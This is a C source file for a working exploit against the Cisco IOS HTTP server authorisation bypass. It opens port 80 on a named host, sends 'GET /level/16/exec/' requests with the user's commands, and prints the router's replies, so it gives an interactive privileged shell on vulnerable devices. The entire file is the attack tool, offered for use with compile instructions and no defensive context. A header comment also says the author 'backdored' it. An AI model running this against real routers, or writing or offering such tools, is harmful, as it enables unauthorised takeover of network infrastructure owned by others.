/* Coded and backdored by Eliel C. Sardanons <eliel.sardanons@philips.edu.ar>
 * to compile:
 * bash# gcc -o cisco cisco.c 
 */

#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define HTTP_PORT 80
#define PROMPT "\ncisco$ "

int usage (char *progname) {
	printf ("Usage:\n\t%s server\n", progname);
	exit(-1);
}								
	
int main (int argc, char *argv[]) {
	struct hostent *he;
	struct sockaddr_in sin;
	int sck, i;
	char command[256], buffer[512];
	if (argc < 2)
		usage(argv[0]);
	if ((he = gethostbyname(argv[1])) == NULL) {
		perror("host()");
		exit(-1);
	}
	sin.sin_family = AF_INET;
	sin.sin_port = htons(HTTP_PORT);
	sin.sin_addr = *((struct in_addr *)he->h_addr);
	while (1) {
		if ((sck = socket (AF_INET, SOCK_STREAM, 6)) <= 0) {
			perror("socket()");
			exit(-1);
		}
		if ((connect(sck, (struct sockaddr *)&sin, sizeof(sin))) < 0) {
			perror ("connect()");
			exit(-1);
		}
		printf (PROMPT);
		fgets (command, 256, stdin);
		if (strlen(command) == 1) 
			break;
		for (i=0;i<strlen(command);i++) {
			if (command[i] == ' ')
				command[i] = '/';
		}
		snprintf (buffer, sizeof(buffer), 
							"GET /level/16/exec/%s HTTP/1.0\r\n\r\n", command); 
		write (sck, buffer, strlen(buffer));
		memset (buffer, 0, sizeof(buffer));
		while ((read (sck, buffer, sizeof(buffer))) != 0) {
			if ((strstr(buffer, "CR</A>")) != 0) {
				printf ("You need to complete the command with more parameters or finish the command with 'CR'\n");
				memset (buffer, 0, sizeof(buffer));
				break;
			} else if ((strstr(buffer, "Unauthorized")) != 0) {
				printf ("Server not vulnerable\n");
				exit(-1);
			} else {
				printf ("%s", buffer);
				memset (buffer, 0, sizeof(buffer));
			}
		 }
	}
	printf ("Thanks...\n");
	exit(0);
}